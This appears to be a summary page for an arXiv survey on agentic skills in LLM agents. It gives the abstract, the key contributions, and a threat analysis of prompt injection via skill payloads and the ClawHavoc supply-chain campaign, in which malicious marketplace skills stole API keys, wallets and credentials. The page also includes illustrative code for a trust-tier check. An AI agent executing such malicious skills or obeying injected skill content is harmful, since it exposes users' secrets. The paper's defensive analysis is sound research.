survey 2026

SoK: Agentic Skills -- Beyond Tool Use in LLM Agents

Yanna Jiang 1, Delong Li 1, Haiyu Deng 1, Baihe Ma 1, Xu Wang 1, Qin Wang 1,2, Guangsheng Yu 1

0 citations · 74 references · arXiv (Cornell University)


Published on arXiv · 2602.20867

AI Supply Chain Attacks

OWASP ML Top 10 — ML06

Prompt Injection

OWASP LLM Top 10 — LLM01

Insecure Plugin Design

OWASP LLM Top 10 — LLM07

Key Finding

The ClawHavoc campaign infiltrated ~1,200 malicious skills into a major agent marketplace, exfiltrating API keys, cryptocurrency wallets, and browser credentials at scale, illustrating critical supply-chain vulnerabilities in skill-based LLM agents.


Agentic systems increasingly rely on reusable procedural capabilities, a.k.a. agentic skills, to execute long-horizon workflows reliably. These capabilities are callable modules that package procedural knowledge with explicit applicability conditions, execution policies, termination criteria, and reusable interfaces. Unlike one-off plans or atomic tool calls, skills persist and transfer across tasks, often generalizing well. This paper maps the skill layer across the full lifecycle (discovery, practice, distillation, storage, composition, evaluation, and update) and introduces two complementary taxonomies. The first is a system-level set of seven design patterns capturing how skills are packaged and executed in practice, from metadata-driven progressive disclosure and executable code skills to self-evolving libraries and marketplace distribution. The second is an orthogonal representation × scope taxonomy describing what skills are (natural language, code, policy, hybrid) and what environments they operate over (web, OS, software engineering, robotics). We analyze the security and governance implications of skill-based agents, covering supply-chain risks, prompt injection via skill payloads, and trust-tiered execution, grounded by a case study of the ClawHavoc campaign, in which nearly 1,200 malicious skills infiltrated a major agent marketplace, exfiltrating API keys, cryptocurrency wallets, and browser credentials at scale. We further survey deterministic evaluation approaches, anchored by recent benchmark evidence that curated skills can substantially improve agent success rates while self-generated skills may degrade them. We conclude with open challenges toward robust, verifiable, and certifiable skills for real-world autonomous agents.
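The abstract's definition of a skill — a callable module packaging procedural knowledge with applicability conditions, an execution policy, and termination criteria — can be sketched as a small data structure. This is an illustrative reading of that definition, not the paper's implementation; all names (`Skill`, `applicable`, `terminated`, `max_steps`) are hypothetical.

```python
from dataclasses import dataclass
from typing import Callable

@dataclass
class Skill:
    """Illustrative skill: procedure + applicability + policy + termination."""
    name: str
    applicable: Callable[[dict], bool]   # applicability condition over task state
    execute: Callable[[dict], dict]      # one step of the packaged procedure
    terminated: Callable[[dict], bool]   # termination criterion
    max_steps: int = 10                  # execution-policy bound

    def run(self, state: dict) -> dict:
        if not self.applicable(state):
            raise ValueError(f"skill {self.name!r} not applicable to this state")
        for _ in range(self.max_steps):
            if self.terminated(state):
                break
            state = self.execute(state)
        return state

# Toy usage: a "count to target" procedure standing in for a real workflow.
count_up = Skill(
    name="count_up",
    applicable=lambda s: "n" in s and "target" in s,
    execute=lambda s: {**s, "n": s["n"] + 1},
    terminated=lambda s: s["n"] >= s["target"],
)
print(count_up.run({"n": 0, "target": 3})["n"])  # -> 3
```

The reusable interface here is simply `run(state)`; the same structure can be stored, composed, and re-invoked across tasks, which is what distinguishes a skill from a one-off plan.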


Key Contributions

  • Unified formal definition and lifecycle model for agentic skills (discovery, practice, distillation, storage, composition, evaluation, update) with a seven-pattern design taxonomy
  • Security and governance analysis covering supply-chain risks, prompt injection via skill payloads, trust-tiered execution, and a pattern-specific risk matrix grounded by the ClawHavoc case study (~1,200 malicious marketplace skills)
  • Evaluation framework surveying deterministic approaches with benchmark evidence that curated skills improve agent success while self-generated skills may degrade performance

🛡️ Threat Analysis

AI Supply Chain Attacks

The ClawHavoc case study is explicitly a supply-chain attack where ~1,200 malicious skills infiltrated a major agent marketplace, exfiltrating API keys, cryptocurrency wallets, and browser credentials — a canonical ML supply-chain compromise via a skill distribution platform.
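One mitigation the paper discusses is trust-tiered execution. A minimal sketch, assuming a registry of known-good skill digests (the registry, tier names, and policy below are illustrative, not the paper's or any marketplace's actual mechanism): skills whose payload hash is not in the registry are demoted to a sandboxed tier rather than granted full tool access.

```python
import hashlib

# Hypothetical registry mapping trusted payload digests to publishers,
# assumed to be distributed out of band (e.g., signed by the marketplace).
TRUSTED_DIGESTS: dict[str, str] = {}

def sha256(payload: bytes) -> str:
    return hashlib.sha256(payload).hexdigest()

def trust_tier(payload: bytes) -> str:
    """Assign an execution tier based on whether the payload is known-good."""
    if sha256(payload) in TRUSTED_DIGESTS:
        return "trusted"    # may run with full tool access
    return "sandboxed"      # no network/filesystem; outputs reviewed first

# Register a benign first-party skill, then classify two payloads.
benign = b"echo hello"
TRUSTED_DIGESTS[sha256(benign)] = "first-party"

print(trust_tier(benign))            # -> trusted
print(trust_tier(b"curl evil.sh"))  # -> sandboxed
```

Under this scheme a ClawHavoc-style payload never matches a registered digest, so it lands in the sandboxed tier by default; the residual risk shifts to compromise of the registry itself.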


Details

Domains
nlp, reinforcement-learning
Model Types
llm
Threat Tags
inference_time, training_time
Applications
llm agents, autonomous agents, agent marketplaces, multi-agent systems